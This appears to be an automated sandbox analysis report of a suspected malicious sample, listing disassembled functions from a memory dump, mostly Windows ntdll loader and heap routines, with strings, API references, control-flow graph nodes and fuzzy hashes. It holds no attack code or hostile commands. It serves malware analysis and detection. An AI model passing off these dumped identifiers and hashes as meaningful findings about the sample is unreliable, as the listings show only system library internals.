                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1121 3261640d-3261646c call 32616c11 1124 32616472-3261649e call 3263e8a6 call 32616b45 1121->1124 1125 32679770-32679779 1121->1125 1140 326164a4-326164a6 1124->1140 1141 326797e9-326797f2 call 3264e7e0 1124->1141 1126 326797b3-326797b6 1125->1126 1127 3267977b-3267978d 1125->1127 1131 326797dd 1126->1131 1130 326797a0-326797b0 call 3269e692 1127->1130 1130->1126 1133 32616542-3261654a 1131->1133 1134 326797e3-326797e4 1131->1134 1137 32679827-3267982b call 3261ba80 1133->1137 1138 32616550-32616564 call 32664b50 1133->1138 1134->1133 1148 32679830 1137->1148 1145 326797f7-326797fe 1140->1145 1146 326164ac-326164d8 call 32657df6 call 3263d3e1 call 32616868 1140->1146 1141->1145 1151 32679800 call 3269e692 1145->1151 1152 326797db 1145->1152 1161 32679802-3267980b 1146->1161 1162 326164de-32616526 RtlDebugPrintTimes 1146->1162 1148->1148 1151->1152 1152->1131 1161->1126 1163 3267980d 1161->1163 1162->1133 1166 32616528-3261653c call 32616565 1162->1166 1163->1130 1166->1133 1169 3267980f-32679822 GetPEB call 32633bc0 1166->1169 1169->1133
                                                                                                                                                APIs
                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 3261651C
                                                                                                                                                  • Part of subcall function 32616565: RtlDebugPrintTimes.NTDLL ref: 32616614
                                                                                                                                                  • Part of subcall function 32616565: RtlDebugPrintTimes.NTDLL ref: 3261665F
                                                                                                                                                Strings
                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3267977C
                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 326797A0, 326797C9
                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 32679790
                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 326797B9
                                                                                                                                                • apphelp.dll, xrefs: 32616446
                                                                                                                                                • LdrpInitShimEngine, xrefs: 32679783, 32679796, 326797BF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                • API String ID: 3446177414-204845295
                                                                                                                                                • Opcode ID: 84d69de10524695e983b74decb7dd2106e1f3d1db03a20df0511fa6880556c5d
                                                                                                                                                • Instruction ID: 70915a11cecc0aced0426850ca1dc2bf8154f7b6008975e0f00772ccbdb8ab4e
                                                                                                                                                • Opcode Fuzzy Hash: 84d69de10524695e983b74decb7dd2106e1f3d1db03a20df0511fa6880556c5d
                                                                                                                                                • Instruction Fuzzy Hash: 4551E17524A3419FE319CF24D880F9B77E8FF88354F404919F685A72A0EA70F945CB92
                                                                                                                                                Function 3261D02D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1378 3261d02d-3261d056 1379 3267a5a1 1378->1379 1380 3261d05c-3261d05f 1378->1380 1383 3267a5ab-3267a5b4 call 32662a80 1379->1383 1380->1379 1381 3261d065-3261d0b5 call 32665050 call 32662ab0 1380->1381 1389 3267a514-3267a52e call 326dadd6 1381->1389 1390 3261d0bb-3261d0cc call 3261d736 1381->1390 1391 3267a5b9-3267a5bb 1383->1391 1401 3267a534-3267a537 1389->1401 1402 3261d194-3261d199 1389->1402 1403 3261d0d2-3261d0d5 1390->1403 1404 3267a56f 1390->1404 1392 3267a5c1-3267a5c7 1391->1392 1393 3261d1de-3261d1e6 1391->1393 1392->1393 1396 3267a5cd-3267a5d0 1392->1396 1399 3267a5d2-3267a5e4 GetPEB call 32633bc0 1396->1399 1400 3267a5ef-3267a5f1 1396->1400 1399->1400 1400->1393 1408 3267a559-3267a569 call 32662a80 1401->1408 1409 3267a539-3267a54d call 326dad61 1401->1409 1406 3261d1a4-3261d1a9 1402->1406 1407 3261d19b-3261d19f call 32662a80 1402->1407 1410 3261d1e9-3261d1ec 1403->1410 1411 3261d0db-3261d0e0 1403->1411 1413 3267a579-3267a593 call 326dadd6 1404->1413 1406->1383 1417 3261d1af-3261d1b4 1406->1417 1407->1406 1408->1404 1409->1408 1436 3267a54f-3267a554 1409->1436 1414 3261d1f2-3261d1fc 1410->1414 1415 3261d2c9-3261d2d9 call 3261d9a2 1410->1415 1419 3261d192 1411->1419 1420 3261d0e6-3261d130 call 32665050 call 32662ab0 1411->1420 1413->1402 1439 3267a599-3267a59b 1413->1439 1425 3261d202-3261d25a call 32665050 call 32662ab0 1414->1425 1426 3261d2de-3261d2e0 1414->1426 1415->1402 1427 3261d1b6-3261d1ba call 32662a80 1417->1427 1428 3261d1bf-3261d1c1 1417->1428 1419->1402 1420->1413 1451 3261d136-3261d184 call 32665050 call 32662ab0 1420->1451 1432 3261d25f-3261d261 1425->1432 1426->1432 1427->1428 1428->1391 1438 3261d1c7-3261d1ca 1428->1438 1432->1415 1441 3261d263-3261d2c7 call 32665050 call 32662ab0 1432->1441 1436->1408 1442 3267a556-3267a558 1436->1442 1438->1393 1444 3261d1cc-3261d1d8 call 3261daa8 1438->1444 1439->1379 1441->1415 1458 3261d2e5 1441->1458 1442->1408 1444->1393 1453 3267a5e6-3267a5ea 1444->1453 1451->1415 1460 3261d18a-3261d190 1451->1460 1453->1400 1458->1389 1460->1402 1460->1419
                                                                                                                                                Strings
                                                                                                                                                • h.d2, xrefs: 3267A5D2
                                                                                                                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3261D0E6
                                                                                                                                                • @, xrefs: 3261D2B3
                                                                                                                                                • @, xrefs: 3261D24F
                                                                                                                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 3261D136
                                                                                                                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3261D06F
                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3261D263
                                                                                                                                                • @, xrefs: 3261D09D
                                                                                                                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3261D202
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.d2
                                                                                                                                                • API String ID: 0-1582831309
                                                                                                                                                • Opcode ID: ccd59e668daea1c722d72dd7e2c90a6c22a8b5796407dd57562c4a3f4e553ec1
                                                                                                                                                • Instruction ID: b3996626813d51af28e5e62a30210f3128e881734b8e194814cad415cac005f4
                                                                                                                                                • Opcode Fuzzy Hash: ccd59e668daea1c722d72dd7e2c90a6c22a8b5796407dd57562c4a3f4e553ec1
                                                                                                                                                • Instruction Fuzzy Hash: C3A151B15083459FE321CF14D980B9BB7E8BF88759F00492EFA9896241DB75E908CF93
                                                                                                                                                Function 3263B650 Relevance: 11.3, Strings: 8, Instructions: 1323COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$\SysWOW64$minkernel\ntdll\ldrutil.c$xt_2
                                                                                                                                                • API String ID: 0-889383425
                                                                                                                                                • Opcode ID: 7ea008deb725093b13d332d6e2059742ff001e6967e89944dc8907db14d79f1a
                                                                                                                                                • Instruction ID: d3ea9a85fbe3f62f8b401f2a6879fa6e03f5de05b9dc1f48d4ae0b8cd9d770b3
                                                                                                                                                • Opcode Fuzzy Hash: 7ea008deb725093b13d332d6e2059742ff001e6967e89944dc8907db14d79f1a
                                                                                                                                                • Instruction Fuzzy Hash: 48C27CB4A017298FDB29CF15CC907AAB7B5BF48348F0041EDEA49AB251DB709E81CF55
                                                                                                                                                Function 3264D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 3264D879
                                                                                                                                                  • Part of subcall function 32624779: RtlDebugPrintTimes.NTDLL ref: 32624817
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                • API String ID: 3446177414-1975516107
                                                                                                                                                • Opcode ID: 357672e9efce1400a077fcf79fa205dd8e6893edb21d0dad1abbc71858b4685a
                                                                                                                                                • Instruction ID: d41874c00e6b38399bc83a2dca875c2456a44fb8017ae3ed26911d70f922749f
                                                                                                                                                • Opcode Fuzzy Hash: 357672e9efce1400a077fcf79fa205dd8e6893edb21d0dad1abbc71858b4685a
                                                                                                                                                • Instruction Fuzzy Hash: 4D511175E05345DFEB09CFA4C480B9EBBB1BF48758F618059D8416B282DFB4A986CF81
                                                                                                                                                Function 3264DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                • API String ID: 3446177414-3224558752
                                                                                                                                                • Opcode ID: d3fda778cdda06541b8087535561c24cc9485099bfa38e9d661dfa32da4f0e53
                                                                                                                                                • Instruction ID: 432591651eb8cacf0859e8788e462a88585a983389b5382b5c14f1917c0e6019
                                                                                                                                                • Opcode Fuzzy Hash: d3fda778cdda06541b8087535561c24cc9485099bfa38e9d661dfa32da4f0e53
                                                                                                                                                • Instruction Fuzzy Hash: DF415735A00700EFE715CF24C484B5AB7B8FF45364F1489AAE84597782CF79A9C1CB96
                                                                                                                                                Function 326CF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                • API String ID: 0-2224505338
                                                                                                                                                • Opcode ID: 37d40e4dab099b8de7dc1c33ac63f1eb8ce84fb9aaa47ff1308a161cd9c12066
                                                                                                                                                • Instruction ID: e5428df9e6322250855bb8cdb692feaff06d0e8e10257337eee6a5ecda99d8b4
                                                                                                                                                • Opcode Fuzzy Hash: 37d40e4dab099b8de7dc1c33ac63f1eb8ce84fb9aaa47ff1308a161cd9c12066
                                                                                                                                                • Instruction Fuzzy Hash: 7D510436201294EFE715EF64D844F5A73BCEF097B4F2488AAF5019B219CA72FA40CE15
                                                                                                                                                Function 3261F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                • API String ID: 0-523794902
                                                                                                                                                • Opcode ID: ed5f12b0fe8003adb1a3a2370054baae6c4297336179e466dc7d6a64c4bf368a
                                                                                                                                                • Instruction ID: 7c2538043b41009435cd0a83e45209113314931d3f471e05f276ee166a442def
                                                                                                                                                • Opcode Fuzzy Hash: ed5f12b0fe8003adb1a3a2370054baae6c4297336179e466dc7d6a64c4bf368a
                                                                                                                                                • Instruction Fuzzy Hash: 7E42DE75205781DFD309CF28C884B6ABBE9FF88348F04496DE8858B252DB74F945CB92
                                                                                                                                                Function 3264510F Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.d2
                                                                                                                                                • API String ID: 0-1330769605
                                                                                                                                                • Opcode ID: cde70234dbac3e9d18b5bdfbc3ba28956fd18c5f79e890be570d7500ebf28875
                                                                                                                                                • Instruction ID: 2a34bf735f219720a8bea52c5e312a24e79ee6e491f03c83dff269a29105ae3f
                                                                                                                                                • Opcode Fuzzy Hash: cde70234dbac3e9d18b5bdfbc3ba28956fd18c5f79e890be570d7500ebf28875
                                                                                                                                                • Instruction Fuzzy Hash: A4F13BB6D01219EFDB16CF98C990ADEBBB8EF58754F50406AE901E7210EE749E01CB94
                                                                                                                                                Function 3263B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                • API String ID: 0-122214566
                                                                                                                                                • Opcode ID: 1959f34a9fd2539fc434ca1932b3e7873ab32626f85a8e7d61bf7c43dc3dad3b
                                                                                                                                                • Instruction ID: b2930c967256a54acc3efa342a3360573123ac2f741505ea495d2afdd36e9185
                                                                                                                                                • Opcode Fuzzy Hash: 1959f34a9fd2539fc434ca1932b3e7873ab32626f85a8e7d61bf7c43dc3dad3b
                                                                                                                                                • Instruction Fuzzy Hash: E0C13975A02319ABEB1A8B64C8D0BBE77A1BF45744F54416DEE01EB2A0DFB4CD44C392
                                                                                                                                                Function 32652594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 32691F8A
                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 32691FC9
                                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 32691FA9
                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 32691F82
                                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 32691F6A, 32691FA4, 32691FC4
                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 32691F6F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                • API String ID: 0-861424205
                                                                                                                                                • Opcode ID: a63822ebe1d0c27eb6b5601b2a69d266a29f928bd138d93ef27b7cb134c1881e
                                                                                                                                                • Instruction ID: 93b916e8dfc778464f8fc4804db31731252b2745c0422139976e837be0f78fd2
                                                                                                                                                • Opcode Fuzzy Hash: a63822ebe1d0c27eb6b5601b2a69d266a29f928bd138d93ef27b7cb134c1881e
                                                                                                                                                • Instruction Fuzzy Hash: B031D6B6E00218BBF7158A969C94F9B77A8DF44BA4F2140E9B90577241DB70EE00CBE5
                                                                                                                                                Function 32630680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                                • Opcode ID: c7b7df45dd73832cf339e217e95464cf905a2eae09eae7f23d7d78c912927309
                                                                                                                                                • Instruction ID: 4a9c67f09232bc7c5c238cc5518b348886f82f7201af1ff6be533b0219c075e9
                                                                                                                                                • Opcode Fuzzy Hash: c7b7df45dd73832cf339e217e95464cf905a2eae09eae7f23d7d78c912927309
                                                                                                                                                • Instruction Fuzzy Hash: E0F1CC74A01A05DFEB0ACF68C890B6AB7F5FF84344F1081A9E9459B391DB34E985CF91
                                                                                                                                                Function 3265C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 326980F3
                                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 326980E9
                                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 326980E2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                • API String ID: 3446177414-1783798831
                                                                                                                                                • Opcode ID: 517af15d34580861c66560f33a605bde623ce635184f39044ad157c2407a8793
                                                                                                                                                • Instruction ID: 42cf7dee9f132e4320f26041b5d692e9338392a164dc13ba6ecf79031a859989
                                                                                                                                                • Opcode Fuzzy Hash: 517af15d34580861c66560f33a605bde623ce635184f39044ad157c2407a8793
                                                                                                                                                • Instruction Fuzzy Hash: 314123B5542300ABD325EF24DC40B8B77E8FF88750F20592AB949E3251EF70E945CB96
                                                                                                                                                Function 326A43D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 326A4508
                                                                                                                                                • LdrpCheckRedirection, xrefs: 326A450F
                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 326A4519
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                • API String ID: 3446177414-3154609507
                                                                                                                                                • Opcode ID: 2abd1c3dd7d332de650452ccbce9b4d24b6b55eb9341f80922efb0c3249b753d
                                                                                                                                                • Instruction ID: 8b2bd103bf89b0ecab257b2a4cecda3abbf5cc6e95bfea99d7defd4edcf86dbf
                                                                                                                                                • Opcode Fuzzy Hash: 2abd1c3dd7d332de650452ccbce9b4d24b6b55eb9341f80922efb0c3249b753d
                                                                                                                                                • Instruction Fuzzy Hash: A441CEF66053119BDB15CF58CC60A16BBE4FF88794F050AA9EC98E7252DB31EC01CB92
                                                                                                                                                Function 32617662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlReAllocateHeap
                                                                                                                                                • API String ID: 0-941669491
                                                                                                                                                • Opcode ID: 28b5422eb418b97a366b12612ff0050b66dbb2ba789625bca9065f63cf486ed6
                                                                                                                                                • Instruction ID: b910221adb2f280f5b5fc65eea835583efbeb5511dd68286633e8e223e28453c
                                                                                                                                                • Opcode Fuzzy Hash: 28b5422eb418b97a366b12612ff0050b66dbb2ba789625bca9065f63cf486ed6
                                                                                                                                                • Instruction Fuzzy Hash: C701FC36115140FEF309872CF818F5677B8EF46774F28489EE00047991DEB6BD41D955
                                                                                                                                                Function 32620485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • kLsE, xrefs: 326205FE
                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32620586
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                • API String ID: 3446177414-2547482624
                                                                                                                                                • Opcode ID: e5bac3d6d80a1e024a25d7eaa2e0602cb293beafe8b3b41df1fe4db5c6981831
